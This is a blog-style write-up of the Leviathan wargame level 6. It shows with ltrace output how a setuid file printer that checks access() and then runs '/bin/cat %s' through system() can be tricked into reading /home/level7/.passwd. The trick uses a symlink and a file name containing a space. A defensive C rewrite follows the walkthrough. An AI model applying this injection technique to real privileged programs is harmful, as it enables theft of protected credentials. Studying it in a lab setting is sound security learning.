15 November 2010

Leviathan level 6 wargame at intruded.net (6/8)

The program for this level, printfile, is located in /wargame and seems to print a file. If we run it:

level6@leviathan:/wargame$ ./printfile
*** File Printer ***
Usage: ./printfile filename

Trying to read the password of the next level...

level6@leviathan:/wargame$ ln -s /home/level7/.passwd /tmp/passwd
level6@leviathan:/wargame$ ./printfile /tmp/pass
You cant have that file...

That doesn't work... let's look at it with ltrace...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/passwd
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/passwd", 0)                         = -1
puts("You cant have that file..."You cant have that file...
)               = 27
+++ exited (status 1) +++

It checks the permissions with access() before showing the file... OK, let's feed the program a file with the correct permissions...

level6@leviathan:/wargame$ echo "Hi" > /tmp/world
level6@leviathan:/wargame$ ./printfile /tmp/world

That seems to work fine; let's ltrace it...

level6@leviathan:/wargame$ ltrace ./printfile /tmp/world
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/world", 0)                          = 0
snprintf("/bin/cat /tmp/world", 511, "/bin/cat %s", "/tmp/world") = 19
system("/bin/cat /tmp/world"Hi
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

It works: the program constructs the command string with snprintf() and uses system() to show the contents...

Solution: constructing the command string with snprintf() allows us to inject more commands :)

level6@leviathan:/wargame$ ltrace ./printfile "/tmp/hello world"
__libc_start_main(0x8048424, 2, 0xbffffd34, 0x8048570, 0x8048520
access("/tmp/hello world", 0)                    = 0
snprintf("/bin/cat /tmp/hello world", 511, "/bin/cat %s", "/tmp/hello world") = 25
system("/bin/cat /tmp/hello world"/bin/cat: /tmp/hello: No such file or directory
/bin/cat: world: No such file or directory
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++

Watch this... access() is performed on the file "/tmp/hello world", but cat tries to read "/tmp/hello" and "world" :) Easy: create "hello world" with some garbage inside, and link hello to the passwd file :)
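For the defensive side of the trace above, here is an added example (not part of the original post and not the wargame's source) of how a setuid file printer can avoid both the access()/use mismatch and the shell. The function name `print_file_safe` is hypothetical; the sketch assumes a POSIX system and drops to the real UID only for the open().

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE                 /* for O_NOFOLLOW and seteuid() */
#endif
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical replacement for the access() + snprintf() + system() sequence
 * seen in the ltrace output. Copies `path` to `outfd` and returns the number
 * of bytes written, or -1 on error. */
long print_file_safe(const char *path, int outfd)
{
    uid_t privileged = geteuid();
    struct stat st;
    char buf[4096];
    long total = 0;
    ssize_t n;

    /* Open as the real user: the kernel applies the caller's own permissions
     * at the moment of the open, so no separate access() check is needed. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* The path reaches open() as one string: no shell, no word splitting.
     * O_NOFOLLOW also refuses a symlink as the final path component. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (seteuid(privileged) != 0)
        abort();                    /* never continue in an unknown state */
    if (fd < 0)
        return -1;
    /* Judge the object that was actually opened, not its name. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if (write(outfd, buf, (size_t)n) != n) {
            total = -1;
            break;
        }
        total += n;
    }
    close(fd);
    return (n < 0) ? -1 : total;
}

int main(int argc, char **argv)
{
    return (argc == 2 && print_file_safe(argv[1], STDOUT_FILENO) >= 0) ? 0 : 1;
}
```

With this shape, a file name containing a space is read as exactly the file that was checked, and a link placed in /tmp is either refused or opened with the caller's own permissions.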

Posted at BinaryCell
